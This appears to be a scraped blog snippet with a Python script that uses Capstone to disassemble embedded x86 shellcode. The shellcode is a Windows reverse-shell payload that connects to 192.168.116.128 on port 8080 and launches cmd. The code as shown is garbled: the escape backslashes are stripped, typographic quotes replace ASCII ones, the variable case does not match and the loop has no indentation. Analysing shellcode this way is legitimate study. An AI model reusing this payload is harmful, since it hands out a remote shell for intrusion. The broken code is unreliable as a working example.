#!/usr/bin/env

from capstone import *

 

Shellcode = “”

shellcode += “xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8b”

shellcode += “x50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7”

shellcode += “x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcf”

shellcode += “x0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3c”

shellcode += “x8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01”

shellcode += “xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31”

shellcode += “xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7d”

shellcode += “xf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66”

shellcode += “x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0”

shellcode += “x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5f”

shellcode += “x5fx5ax8bx12xebx8dx5dx68x33x32x00x00x68”

shellcode += “x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8”

shellcode += “x90x01x00x00x29xc4x54x50x68x29x80x6bx00”

shellcode += “xffxd5x50x50x50x50x40x50x40x50x68xeax0f”

shellcode += “xdfxe0xffxd5x97x6ax05x68xc0xa8x74x80x68”

shellcode += “x02x00x1fx90x89xe6x6ax10x56x57x68x99xa5”

shellcode += “x74x61xffxd5x85xc0x74x0cxffx4ex08x75xec”

shellcode += “x68xf0xb5xa2x56xffxd5x68x63x6dx64x00x89”

shellcode += “xe3x57x57x57x31xf6x6ax12x59x56xe2xfdx66”

shellcode += “xc7x44x24x3cx01x01x8dx44x24x10xc6x00x44”

shellcode += “x54x50x56x56x56x46x56x4ex56x56x53x56x68”

shellcode += “x79xccx3fx86xffxd5x89xe0x4ex56x46xffx30”

shellcode += “x68x08x87x1dx60xffxd5xbbxaaxc5xe2x5dx68”

shellcode += “xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0”

shellcode += “x75x05xbbx47x13x72x6fx6ax00x53xffxd5”

 

md = Cs(CS_ARCH_X86, CS_MODE_32)

for i in md.disasm(shellcode, 0x00):

print(“0x%x:t%st%s” %(i.address, i.mnemonic, i.op_str))



Source link

LEAVE A REPLY

Please enter your comment!
Please enter your name here